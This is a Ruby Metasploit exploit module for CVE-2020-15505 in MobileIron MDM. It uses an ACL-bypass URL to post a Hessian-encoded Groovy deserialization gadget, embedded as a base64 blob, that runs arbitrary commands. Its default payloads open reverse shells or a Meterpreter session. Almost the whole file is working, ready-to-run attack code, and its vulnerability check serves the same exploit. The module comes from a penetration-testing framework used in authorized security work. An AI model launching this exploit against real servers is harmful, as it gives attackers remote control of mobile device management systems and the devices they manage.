##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MobileIron MDM Hessian-Based Java Deserialization RCE',
        'Description' => %q{
          This module exploits an ACL bypass in MobileIron MDM products to
          execute a Groovy gadget against a Hessian-based Java deserialization
          endpoint.
        },
        'Author' => [
          'Orange Tsai', # Discovery
          'rootxharsh', # Exploit
          'iamnoooob', # Exploit
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-15505'],
          ['URL', 'https://www.mobileiron.com/en/blog/mobileiron-security-updates-available'],
          ['URL', 'https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html'],
          ['URL', 'https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505']
        ],
        'DisclosureDate' => '2020-09-12', # Public disclosure
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :bourne,
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Call
    res = send_request_hessian('c')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    unless res.code == 200 && res.headers['Content-Type'] == 'application/x-hessian'
      return CheckCode::Safe('ACL bypass failed.')
    end

    CheckCode::Vulnerable('ACL bypass successful.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    send_request_hessian(groovy_gadget(cmd))
  end

  def send_request_hessian(data)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mifs/.;/services/LogService'),
      'ctype' => 'x-application/hessian',
      'headers' => {
        'Referer' => rand_text_english(8..42)
      },
      'data' => data
    )
  end

  def groovy_gadget(cmd)
    # http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers
    hessian = "c\x01\x00H\x00\x08#{rand_text_english(8)}"

    # Cale hates me for this
    hessian << Rex::Text.zlib_inflate(Rex::Text.decode_base64(
      <<~HESSIAN
        eNpFj01PwkAQhkcRBUz8CBe9cfVg+Q3YYDBKIS7h4mnbju2S3W4zuy20v95BQS6bfXffPPPM
        3APMPQwzsrZugsorHUx3pSxSK+Ae/25LsiWSV+i4CgJ6uXR5aFPk+GQpCxK+57JywQFDVeGV
        wWCOPrdpqK2rCAVcmt8soOu8JC/gltBZXaPwJD1mzRvAnt9PFWHiVY2Hh0cjd8pUJqpMjLT4
        XkqSzEJyh0IvRY0ZM9joYSNrGWhZZAGLJ+jcS6V0iiRgSPiHnhJZ4qkozauAq8Qaw4uuNcM6
        nMexKsYuF3D+nLDlbBK+j1az6Wj5MYmmq/bf0FITCbjGolZkC4OF59g/DnERN7t2WyB9MvhC
        wMDnyi3iDX9y8aY8rrFqSnRrD3dfJ/dQS+f2QsCUTpxso7Zt95yz09EOfgCmKo1k
      HESSIAN
    ))

    hessian.sub("\x00\x0fHACK THE PLANET", "#{[cmd.length].pack('n')}#{cmd}")
  end

end
